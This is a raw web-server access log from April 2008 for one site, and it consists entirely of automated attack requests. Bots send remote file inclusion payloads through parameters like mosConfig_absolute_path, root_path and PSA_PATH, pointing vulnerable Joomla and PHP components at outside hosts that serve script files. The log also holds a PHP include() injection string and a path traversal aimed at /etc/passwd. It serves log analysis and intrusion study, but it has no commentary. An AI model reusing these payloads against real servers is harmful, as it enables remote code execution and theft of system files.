70.87.175.3 - - [23/Apr/2008:09:30:02 -0700] "GET /logs/access_080228.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:09:30:51 -0700] "GET /logs/access_080228.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:09:30:52 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.67.27.166 - - [23/Apr/2008:09:31:01 -0700] "GET /logs/index.php?option=com_poll&task=&Itemid=&mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
80.67.27.166 - - [23/Apr/2008:09:31:04 -0700] "GET /index.php?option=com_poll&task=&Itemid=&mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:09:31:04 -0700] "GET /logs/access_080219.log/mcf.php?content=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:09:31:07 -0700] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.54.129.234 - - [23/Apr/2008:09:31:12 -0700] "GET /logs/access_080115.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:09:31:13 -0700] "GET /logs/access_080229.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:09:31:13 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:09:31:13 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.32.4.68 - - [23/Apr/2008:09:31:16 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:09:31:50 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:09:32:42 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:09:32:42 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:09:32:42 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.29.207.126 - - [23/Apr/2008:09:32:57 -0700] "GET /logs/access_080207.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.29.207.126 - - [23/Apr/2008:09:32:59 -0700] "GET /logs/access_071122.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:09:33:00 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.72.218.2 - - [23/Apr/2008:09:33:05 -0700] "GET /logs/access_080207.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.218.2 - - [23/Apr/2008:09:33:07 -0700] "GET /logs/access_071122.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:33:12 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:33:12 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:33:12 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:33:12 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:33:12 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:33:13 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:33:23 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:33:23 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:33:23 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:33:27 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:33:27 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:33:27 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:09:33:33 -0700] "GET /logs/access_080218.log/index2.php?x=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.62.128.4 - - [23/Apr/2008:09:33:35 -0700] "GET /logs/access_080224.log//index.php?pagina=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:09:33:49 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:09:33:49 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:09:33:49 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.3.139.246 - - [23/Apr/2008:09:33:49 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
72.3.139.246 - - [23/Apr/2008:09:33:50 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
75.126.174.50 - - [23/Apr/2008:09:33:57 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
75.126.174.50 - - [23/Apr/2008:09:33:57 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
66.212.16.163 - - [23/Apr/2008:09:33:58 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.62.128.4 - - [23/Apr/2008:09:34:01 -0700] "GET /logs/access_080225.log//index.php?pagina=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.232.71.106 - - [23/Apr/2008:09:34:25 -0700] "GET /modules/My_eGallery/index.php?basepath=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:34:30 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:34:35 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:34:48 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:34:48 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.61.144.44 - - [23/Apr/2008:09:34:59 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "dmulk.com"
207.61.144.44 - - [23/Apr/2008:09:34:59 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "dmulk.com"
24.93.105.27 - - [23/Apr/2008:09:35:23 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
24.93.105.27 - - [23/Apr/2008:09:35:24 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
72.3.139.246 - - [23/Apr/2008:09:36:00 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
72.3.139.246 - - [23/Apr/2008:09:36:00 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
89.42.133.2 - - [23/Apr/2008:09:36:11 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:09:36:13 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:09:36:14 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:09:36:15 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
205.234.213.67 - - [23/Apr/2008:09:36:28 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://electrometro.com.ve/wall/xpl/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
205.234.213.67 - - [23/Apr/2008:09:36:28 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://electrometro.com.ve/wall/xpl/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.57.130.70 - - [23/Apr/2008:09:36:38 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.57.130.70 - - [23/Apr/2008:09:36:38 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.57.130.70 - - [23/Apr/2008:09:36:38 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:09:36:41 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.57.130.70 - - [23/Apr/2008:09:37:15 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:37:52 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:37:53 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:37:53 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:37:54 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:37:54 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:37:54 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.198.149.20 - - [23/Apr/2008:09:37:56 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
217.198.149.20 - - [23/Apr/2008:09:37:56 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
207.61.144.44 - - [23/Apr/2008:09:37:57 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "dmulk.com"
207.61.144.44 - - [23/Apr/2008:09:37:57 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:38:14 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:09:38:14 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.156.192.5 - - [23/Apr/2008:09:38:38 -0700] "GET /logs/index.php?option=com_rss&task=&Itemid=&mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.156.192.5 - - [23/Apr/2008:09:38:40 -0700] "GET /index.php?option=com_rss&task=&Itemid=&mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:39:13 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [23/Apr/2008:09:41:21 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lunk.110mb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:42:27 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:42:27 -0700] "GET //skin/zero_vote/error.php?dir=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:42:28 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.212.197.158 - - [23/Apr/2008:09:42:37 -0700] "GET /logs/index.php?redir=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
88.212.197.158 - - [23/Apr/2008:09:42:39 -0700] "GET /index.php?redir=/../../../../../../../../etc/passwd HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:43:07 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [23/Apr/2008:09:43:33 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [23/Apr/2008:09:43:33 -0700] "GET //Neos_Chronos/header.php?base_folder=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [23/Apr/2008:09:43:33 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [23/Apr/2008:09:43:54 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.101.35.3 - - [23/Apr/2008:09:44:17 -0700] "GET /logs/access_080214.log/admin_modules/admin_module_captions.inc.php?http://www.krigel.borec.cz/skuska/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.101.35.3 - - [23/Apr/2008:09:44:17 -0700] "GET /admin_modules/admin_module_captions.inc.php?http://www.krigel.borec.cz/skuska/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.101.35.3 - - [23/Apr/2008:09:44:17 -0700] "GET /logs/admin_modules/admin_module_captions.inc.php?http://www.krigel.borec.cz/skuska/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.69.224.10 - - [23/Apr/2008:09:44:54 -0700] "GET /logs/access_080321.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:09:44:58 -0700] "GET /logs/access_080229.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.quotationsforlife.com/????? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:09:44:58 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.quotationsforlife.com/????? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:09:44:58 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.quotationsforlife.com/????? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [23/Apr/2008:09:45:44 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.101.35.3 - - [23/Apr/2008:09:45:46 -0700] "GET /logs/access_080214.log/admin_modules/admin_module_rotimage.inc.php?http://www.krigel.borec.cz/skuska/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.101.35.3 - - [23/Apr/2008:09:45:46 -0700] "GET /admin_modules/admin_module_rotimage.inc.php?http://www.krigel.borec.cz/skuska/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.101.35.3 - - [23/Apr/2008:09:45:46 -0700] "GET /logs/admin_modules/admin_module_rotimage.inc.php?http://www.krigel.borec.cz/skuska/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.182.143 - - [23/Apr/2008:09:46:01 -0700] "GET /logs/access_080201.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.cnm.gob.pe/cnm/cache/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.182.143 - - [23/Apr/2008:09:46:02 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.cnm.gob.pe/cnm/cache/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.182.143 - - [23/Apr/2008:09:46:02 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.cnm.gob.pe/cnm/cache/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.56.36 - - [23/Apr/2008:09:46:04 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://gemblog.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [23/Apr/2008:09:46:04 -0700] "GET //skin/zero_vote/error.php?dir=http://gemblog.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [23/Apr/2008:09:46:04 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [23/Apr/2008:09:46:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://gemblog.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
